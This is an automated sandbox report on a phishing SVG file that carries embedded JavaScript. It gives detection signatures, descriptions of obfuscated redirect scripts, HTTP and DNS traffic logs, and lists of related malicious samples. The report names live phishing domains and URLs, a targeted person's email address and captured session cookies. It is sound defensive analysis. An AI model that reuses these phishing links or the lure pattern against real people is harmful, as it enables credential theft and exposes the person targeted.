Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3661627172.svg

Overview

General Information

Sample name:3661627172.svg
Analysis ID:1640783
MD5:b6a88357b2e5cd6ced7d126e00b43081
SHA1:d10bc9ec13b8f1366af43eb1a7c6b1e382c52d6e
SHA256:a24d4b69a5ce681a4ad85800aaaaf900ef55c38970c4c0ccf09036d45f1aa975
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

Yara detected HtmlPhish44
Yara detected HtmlPhish80
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
IP address seen in connection with other malware
Internet Provider seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 7552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7740 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1924,i,10494982236509602108,7760536900289131602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 1536 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\3661627172.svg" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3661627172.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
    3661627172.svgJoeSecurity_HtmlPhish_80Yara detected HtmlPhish_80Joe Security
      SourceRuleDescriptionAuthorStrings
      dropped/chromecache_61JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: dropped/chromecache_61, type: DROPPED
        Source: Yara matchFile source: 3661627172.svg, type: SAMPLE
        Source: 1.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://kakhuy07co.woofradio.cfd/3IgjcDhi7bbLzyqNi... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script generates random alphanumeric strings, extracts subdomains from the current URL, and then redirects the user to a new URL with the subdomain or a random string, followed by a suspicious domain and encoded parameters. This behavior is highly indicative of a malicious script, likely used for phishing or other malicious purposes.
        Source: 0.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: data:application/ecmascript;base64,dHJ5IHsKICAgIGZ... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The `duruwo` function appears to be decoding a heavily encoded string, which could be used to execute malicious code or redirect the user to a suspicious domain. Additionally, the script attempts to modify the DOM and the window location, which could be used for phishing or other malicious purposes. Overall, this script exhibits a high level of risk and should be thoroughly investigated before execution.
        Source: 2.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://tonygraham.pwswrp.ru/8T8x6LF1E/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
        Source: Yara matchFile source: 3661627172.svg, type: SAMPLE
        Source: https://tonygraham.pwswrp.ru/8T8x6LF1E/#3ddimaano%40tonygraham.comHTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.6:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.129.81:443 -> 192.168.2.6:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49706 version: TLS 1.2
        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
        Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 20.42.65.91
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
        Source: unknownTCP traffic detected without corresponding DNS query: 142.250.186.99
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.35
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.215
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.68
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
        Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.68
        Source: unknownTCP traffic detected without corresponding DNS query: 20.191.45.158
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /3IgjcDhi7bbLzyqNi74Dxtc1XOq0HV69zuTXLXqnhnYexhMqaslCucBcrtlUAvSaQSHXMHYR05jmstE6iCIFE9U9189WjNjjz6aD13nD5x0ol5cOZZSgb1syufIVGxpC2vKAj025i7NnVFZ9WFKa4eQvR2G4GQlt0NUGhxzukbWwHVKybFjbIYtqNcss36hvXYTTWP3N/YbDwc0zBR3huOXy35f8itseSalgK7rTTlIvJq1ijGxpNl40QvAaRigeNv9w4WgQtfwqU0MZf0ZjFmo6q1zQTQ4McS3cwVqHVdgJViZ0qzMmzR113GzSYhuROL0CvhNuzfR8MwDRER9IzVQyErpcLEotUxoDX7vUphdcT8zYuYxxljaaSPR7ffLs4A1GIZ6QkHtGNWsGY/ddimaano@tonygraham.com HTTP/1.1Host: kakhuy07co.woofradio.cfdConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /8T8x6LF1E/ HTTP/1.1Host: tonygraham.pwswrp.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://kakhuy07co.woofradio.cfd/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: tonygraham.pwswrp.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://tonygraham.pwswrp.ru/8T8x6LF1E/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjFJTU9NK21wdENOYWFzVzV2cjNqWEE9PSIsInZhbHVlIjoiSVZid21IWmo0cWJrT293NVlKME1MQ0F6d3N4Q2xOYWp0TzREcGNidGdyd0phbElhMm1FUHNPQmIzb3BwL3pHUFlFWlZEYnhhcmpQSkRxdUloRmRRRkJBdnVyQy9NRVNqTHRZUUVMVnlya0VmdWMzZDh2TitmQjcxWUZqLzJERU4iLCJtYWMiOiI0YzJmN2EwYzgwODUxYTMzNDhjMTBmZmE3N2JhZjI0ZDQyNWYyYjg3YTkwYzU1ZmEwYWI1ZjUyNTlmOGEyOGU1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImVCRzFMaVBrSEJaMWlvOTNyMXhGcnc9PSIsInZhbHVlIjoiZUR3dlJlcFB4SWFYNnkzaU1mYmMyVnlwdmJUNCtWS3E0QWVWc0tMRjdOc3NyTExhZkxBejE2OW03MmRpcHFkRUV5dWpUcXdnSEx1dkNQUUtSSE1NYzc1WEhmbWdDcHRRYWlrTzdWSmp1VkVkcUxRa0hvNE45bG9ya2tQOUtBYWciLCJtYWMiOiJlYzQxODdhNDkwMjIzZjY1MGI2OTY5Y2NmYWEyMDMxYTZiMGNjYzQwZTAzYjRlNDk2OWYxYzU1OTdhZGNjYzU0IiwidGFnIjoiIn0%3D
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: kakhuy07co.woofradio.cfd
        Source: global trafficDNS traffic detected: DNS query: tonygraham.pwswrp.ru
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: unknownHTTP traffic detected: POST /report/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hN HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 438Content-Type: application/reports+jsonOrigin: https://tonygraham.pwswrp.ruUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Mar 2025 17:18:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hN"}],"group":"cf-nel","max_age":604800}Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer-Timing: cfL4;desc="?proto=TCP&rtt=1110&min_rtt=1096&rtt_var=439&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=2245&delivery_rate=2397350&cwnd=251&unsent_bytes=0&cid=9b7795a91c0410be&ts=80&x=0"Cache-Control: max-age=14400Cf-Cache-Status: MISSCF-RAY: 921e2629fa5e8d3f-EWRalt-svc: h3=":443"; ma=86400
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 142.250.185.132:443 -> 192.168.2.6:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.129.81:443 -> 192.168.2.6:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.6:49706 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7552_859829264Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7552_859829264Jump to behavior
        Source: classification engineClassification label: mal64.phis.winSVG@27/4@10/6
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1924,i,10494982236509602108,7760536900289131602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\3661627172.svg"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1924,i,10494982236509602108,7760536900289131602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2092 /prefetch:3Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        File Deletion
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://tonygraham.pwswrp.ru/8T8x6LF1E/0%Avira URL Cloudsafe
        https://tonygraham.pwswrp.ru/favicon.ico0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        tonygraham.pwswrp.ru
        104.21.32.1
        truetrue
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            kakhuy07co.woofradio.cfd
            104.21.2.147
            truetrue
              unknown
              www.google.com
              142.250.185.132
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://tonygraham.pwswrp.ru/8T8x6LF1E/#3ddimaano%40tonygraham.comfalse
                  unknown
                  https://tonygraham.pwswrp.ru/8T8x6LF1E/true
                  • Avira URL Cloud: safe
                  unknown
                  https://a.nel.cloudflare.com/report/v4?s=Nl%2BJeCS3dkb8Dff3IbH9YTD8fPx1d19BRmmJvN3eH0WTCo%2BpZ9qE35kkki8XMmdrDxXaTwBGr5CK0QkZQJjGXJPpNKWMLmpGidCObFOh%2BeHDDWUP8XASbUGApZ%2BPASX5k1hNfalse
                    high
                    https://tonygraham.pwswrp.ru/favicon.icofalse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.21.32.1
                    tonygraham.pwswrp.ruUnited States
                    13335CLOUDFLARENETUStrue
                    142.250.185.132
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    172.67.129.81
                    unknownUnited States
                    13335CLOUDFLARENETUSfalse
                    35.190.80.1
                    a.nel.cloudflare.comUnited States
                    15169GOOGLEUSfalse
                    IP
                    192.168.2.16
                    192.168.2.6
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1640783
                    Start date and time:2025-03-17 18:17:06 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 25s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:10
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:3661627172.svg
                    Detection:MAL
                    Classification:mal64.phis.winSVG@27/4@10/6
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .svg
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, TextInputHost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.78, 142.250.181.238, 74.125.71.84, 142.250.184.238, 142.250.185.238, 142.250.186.174, 142.250.185.110, 199.232.210.172, 142.250.185.206, 172.217.18.14, 142.250.185.174, 142.250.184.195, 142.250.185.78, 142.250.186.142, 172.217.16.195, 172.217.16.206, 23.199.214.10, 4.175.87.197
                    • Excluded domains from analysis (whitelisted): clients1.google.com, clients2.google.com, fs.microsoft.com, edgedl.me.gvt1.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    No simulations
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.21.32.1SHIPPING DETAILS_PDF.exeGet hashmaliciousFormBookBrowse
                    • www.auto-total.info/3lc9/
                    arGdXDmyGJ.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/a669/
                    2rvyZc27tz.exeGet hashmaliciousFormBookBrowse
                    • www.kdrqcyusevx.info/k7wl/
                    Final PayStub.exeGet hashmaliciousFormBookBrowse
                    • www.oddsideodylicoopod.cloud/g43m/?chops=VTj0v6ZXr6p4dp&Ezr8U8lh=iHr8ZanSEmppv2NUfEI3Sn+a6zMFeevffxq5V5At5Kf3VZBf0vxOCE6EQW7iEjpklZqKgy7LQg==
                    JOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                    • touxzw.ir/sccc/five/fre.php
                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/2dxw/
                    MmF9tcIj1J.exeGet hashmaliciousFormBookBrowse
                    • www.newanthoperso.shop/lqfq/
                    Payment Invoice ref0306252.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/a669/
                    DHL AWB Receipt_pdf.bat.exeGet hashmaliciousFormBookBrowse
                    • www.rbopisalive.cyou/2dxw/
                    RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeGet hashmaliciousFormBookBrowse
                    • www.kdrqcyusevx.info/k7wl/
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUShttps://www.languagesim.com/interpretationterms/Get hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    https://gamma.app/docs/LGBTQ-plus-Race-Ethnicity-Culture-and-Class-An-Intersectional-Con-w8f3vrxu51q7dllGet hashmaliciousUnknownBrowse
                    • 104.18.11.200
                    svchost.exeGet hashmaliciousUnknownBrowse
                    • 104.20.3.235
                    https://click.selectiveasia.com/l391pk/vx4w8gZPGet hashmaliciousUnknownBrowse
                    • 104.18.3.60
                    https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cdGet hashmaliciousHTMLPhisherBrowse
                    • 104.18.94.41
                    VM(Carmen)52177372.mp4.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    phish_alert_iocp_v1.4.48 - 2025-03-17T084047.721.emlGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    https://forms.office.com/e/CzYzGKsuJ0h0Qz9CdMLPYe0NavsKbyZ12uW0kP6Get hashmaliciousHTMLPhisherBrowse
                    • 104.22.20.144
                    Wpb00990__098.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                    • 104.26.0.100
                    http://mycoitracking.com/Get hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    CLOUDFLARENETUShttps://www.languagesim.com/interpretationterms/Get hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    https://gamma.app/docs/LGBTQ-plus-Race-Ethnicity-Culture-and-Class-An-Intersectional-Con-w8f3vrxu51q7dllGet hashmaliciousUnknownBrowse
                    • 104.18.11.200
                    svchost.exeGet hashmaliciousUnknownBrowse
                    • 104.20.3.235
                    https://click.selectiveasia.com/l391pk/vx4w8gZPGet hashmaliciousUnknownBrowse
                    • 104.18.3.60
                    https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cdGet hashmaliciousHTMLPhisherBrowse
                    • 104.18.94.41
                    VM(Carmen)52177372.mp4.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 104.17.25.14
                    phish_alert_iocp_v1.4.48 - 2025-03-17T084047.721.emlGet hashmaliciousUnknownBrowse
                    • 1.1.1.1
                    https://forms.office.com/e/CzYzGKsuJ0h0Qz9CdMLPYe0NavsKbyZ12uW0kP6Get hashmaliciousHTMLPhisherBrowse
                    • 104.22.20.144
                    Wpb00990__098.htmlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                    • 104.26.0.100
                    http://mycoitracking.com/Get hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    No context
                    No context
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:HTML document, ASCII text, with CRLF line terminators
                    Category:downloaded
                    Size (bytes):2064
                    Entropy (8bit):4.688062995007013
                    Encrypted:false
